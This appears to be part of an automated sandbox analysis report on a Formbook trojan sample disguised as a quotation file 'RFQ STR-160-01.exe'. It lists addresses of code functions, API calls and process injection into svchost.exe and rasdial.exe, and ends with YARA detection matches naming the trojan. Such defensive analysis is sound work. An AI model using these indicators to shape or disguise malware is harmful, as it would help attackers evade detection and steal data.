            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03088FF0 NtDeleteFile,7_2_03088FF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03088DA0 NtCreateFile,7_2_03088DA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_030891E0 NtAllocateVirtualMemory,7_2_030891E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03089090 NtClose,7_2_03089090
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_005FD5EB
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005F1201
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_005FE8F6
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006020460_2_00602046
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005980600_2_00598060
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F82980_2_005F8298
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005CE4FF0_2_005CE4FF
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005C676B0_2_005C676B
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006248730_2_00624873
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0059CAF00_2_0059CAF0
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005BCAA00_2_005BCAA0
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005ACC390_2_005ACC39
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005C6DD90_2_005C6DD9
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005AB1190_2_005AB119
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005991C00_2_005991C0
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B13940_2_005B1394
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B781B0_2_005B781B
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005A997D0_2_005A997D
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005979200_2_00597920
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B7A4A0_2_005B7A4A
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B7CA70_2_005B7CA7
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0061BE440_2_0061BE44
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005C9EEE0_2_005C9EEE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0059BF400_2_0059BF40
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_017936000_2_01793600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183632_2_00418363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010CF2_2_004010CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010D02_2_004010D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029ED2_2_004029ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029F02_2_004029F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012802_2_00401280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC7B2_2_0040FC7B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC832_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165432_2_00416543
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E902_2_00402E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FEA32_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E7432_2_0042E743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF232_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07957CBA6_2_07957CBA
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_079784DA6_2_079784DA
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07959C3A6_2_07959C3A
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_0795EA9A6_2_0795EA9A
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_079602DA6_2_079602DA
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07959A126_2_07959A12
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_07959A1A6_2_07959A1A
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 6_2_079620FA6_2_079620FA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050B05917_2_050B0591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050944207_2_05094420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A24467_2_050A2446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF05357_2_04FF0535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0509E4F67_2_0509E4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050147507_2_05014750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FEC7C07_2_04FEC7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF07707_2_04FF0770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0500C6E07_2_0500C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0508A1187_2_0508A118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050781587_2_05078158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050B01AA7_2_050B01AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A41A27_2_050A41A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A81CC7_2_050A81CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050820007_2_05082000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FE01007_2_04FE0100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AA3527_2_050AA352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050B03E67_2_050B03E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FFE3F07_2_04FFE3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050902747_2_05090274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050702C07_2_050702C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FE0CF27_2_04FE0CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0508CD1F7_2_0508CD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05008DBF7_2_05008DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF0C007_2_04FF0C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FEADE07_2_04FEADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05090CB57_2_05090CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FFAD007_2_04FFAD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05032F287_2_05032F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05010F307_2_05010F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05092F307_2_05092F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05064F407_2_05064F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF0E597_2_04FF0E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0506EFA07_2_0506EFA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FFCFE07_2_04FFCFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AEE267_2_050AEE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FE2FC87_2_04FE2FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05002E907_2_05002E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050ACE937_2_050ACE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AEEDB7_2_050AEEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FD68B87_2_04FD68B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050069627_2_05006962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050BA9A67_2_050BA9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF28407_2_04FF2840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FFA8407_2_04FFA840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF29A07_2_04FF29A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0501E8F07_2_0501E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AAB407_2_050AAB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FEEA807_2_04FEEA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A6BD77_2_050A6BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A75717_2_050A7571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FE14607_2_04FE1460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0508D5B07_2_0508D5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050B95C37_2_050B95C3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AF43F7_2_050AF43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AF7B07_2_050AF7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050356307_2_05035630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A16CC7_2_050A16CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF70C07_2_04FF70C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050BB16B7_2_050BB16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0502516C7_2_0502516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FFB1B07_2_04FFB1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FDF1727_2_04FDF172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0509F0CC7_2_0509F0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A70E97_2_050A70E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AF0E07_2_050AF0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A132D7_2_050A132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF52A07_2_04FF52A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0503739A7_2_0503739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FDD34C7_2_04FDD34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0500B2C07_2_0500B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050912ED7_2_050912ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A1D5A7_2_050A1D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A7D737_2_050A7D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0500FDC07_2_0500FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05069C327_2_05069C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF3D407_2_04FF3D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AFCF27_2_050AFCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AFF097_2_050AFF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF9EB07_2_04FF9EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AFFB17_2_050AFFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF1F927_2_04FF1F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050859107_2_05085910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF38E07_2_04FF38E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0500B9507_2_0500B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0505D8007_2_0505D800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04FF99507_2_04FF9950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AFB767_2_050AFB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0500FB807_2_0500FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05065BF07_2_05065BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0502DBF97_2_0502DBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050AFA497_2_050AFA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050A7A467_2_050A7A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05063A6C7_2_05063A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05035AA07_2_05035AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0508DAAC7_2_0508DAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05091AA37_2_05091AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0509DAC67_2_0509DAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03071BF07_2_03071BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0306CB687_2_0306CB68
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0306CB707_2_0306CB70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0306AE107_2_0306AE10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0306CD907_2_0306CD90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_030752507_2_03075250
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0308B6307_2_0308B630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_030734307_2_03073430
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04E3D7787_2_04E3D778
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04E3E70C7_2_04E3E70C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04E3E2587_2_04E3E258
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_04E3E3737_2_04E3E373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0505EA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04FDB970 appears 280 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 05037E54 appears 111 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 05025130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0506F290 appears 105 times
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: String function: 00599CB3 appears 31 times
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: String function: 005AF9F2 appears 40 times
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: String function: 005B0A30 appears 46 times
            Source: RFQ STR-160-01.exe, 00000000.00000003.2139890971.0000000004253000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ STR-160-01.exe
            Source: RFQ STR-160-01.exe, 00000000.00000003.2139610591.00000000043FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ STR-160-01.exe
            Source: RFQ STR-160-01.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
